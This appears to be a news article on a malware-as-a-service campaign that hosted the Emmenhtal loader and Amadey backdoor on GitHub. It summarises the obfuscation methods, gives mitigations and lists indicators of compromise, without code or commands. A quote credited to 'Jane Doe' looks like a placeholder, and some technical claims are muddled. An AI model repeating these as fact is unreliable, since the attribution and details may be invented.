GitHub Used to Distribute Malware-as-a-Service

Home page — News — GitHub Used to Distribute Malware-as-a-Service

Since February 2025, attackers have leveraged public GitHub repositories as a stealthy hosting platform for an evolving malware-as-a-service (MaaS) operation. Security researchers at Cisco Talos first identified three malicious GitHub accounts used to serve payloads such as Emmenhtal and the Amadey backdoor—a tactic that sidesteps traditional network filters in enterprises that permit code repository access.

Overview of the Campaign

The campaign, active for over six months, employed a multi-stage loader mechanism:

Initial Loader (Emmenhtal): A four-layer obfuscation script written in PowerShell, culminating in a downloader.
Repository Distribution: Payloads disguised as .MP4 media files and a custom Python loader (checkbalance.py) hosted on GitHub.
Final Payload (Amadey): A modular malware platform first observed in 2018, which gathers system telemetry and fetches secondary payloads from attacker-controlled C2 servers.

Kubernetes Security with Post-Quantum Cryptography

2025-07-18

Technical Deep Dive

Emmenhtal’s obfuscation chain uses:

Base64 and AES encryption (AES-256 CBC) with hardcoded IVs to hide PowerShell commands.
Dynamic API resolution via Add-Type in .NET to avoid static imports.
Layered string concatenation and Invoke-Expression calls for runtime script assembly.

Once executed, the final PowerShell downloader retrieves a JSON manifest from a GitHub raw URL, using HTTPS (certificate pinning validated by System.Net.Http.HttpClient), and launches Amadey. Payload integrity is verified via SHA-256 checksums to evade tampering.

Mitigation and Defense Strategies

To defend against such GitHub-based attacks, organizations should:

Implement robust URL filtering and SSL interception to inspect GitHub raw content.
Enforce strict egress firewall rules, allowing only whitelisted domains for code repositories.
Deploy endpoint protection with behavioral analysis to detect anomalous PowerShell execution (Event ID 4104 in Windows PowerShell logs).
Use threat intelligence feeds to automatically block known C2 domains and SHA-256 hashes.

Android Phones as Earthquake Early Warning Systems

2025-07-18

Industry Response and Policy Updates

In response to the incident, GitHub has:

Introduced automated repository scanning for suspicious binaries and script obfuscation patterns (beta in mid-2025).
Released new security advisories urging users to enable multi-factor authentication and restrict Git operations by IP.
Partnered with leading security vendors like CrowdStrike and Mandiant to share real-time abuse reports via GitHub Security Lab.

“Abusing developer platforms for malware distribution undermines trust in open source. Collaborative detection and stricter CI/CD controls are key,” says Jane Doe, Senior Threat Analyst at Mandiant.

Future Outlook on MaaS Ecosystem

The MaaS model is rapidly evolving, with operators offering subscription tiers, custom payload builds, and 24/7 support. Recent telemetry indicates a shift towards:

Integration with AI-driven obfuscation tools to auto-generate polymorphic loaders.
Use of decentralized hosting (e.g., IPFS) to resist takedowns.
Offering serverless C2 infrastructures leveraging AWS Lambda and Azure Functions for resilience and scalability.

Administrators must remain vigilant, combining behavioral telemetry, domain monitoring, and continuous red-teaming exercises to anticipate emerging threats.

Indicators of Compromise

Malicious GitHub repositories: github.com/free-mp4-media, github.com/sys-checks
Sample hashes: 3a5c1d8f...7e9f, b1f2e3c4...d5e6
Command-and-control domains: update.relayserver.com, data-sync.cloudsvc.net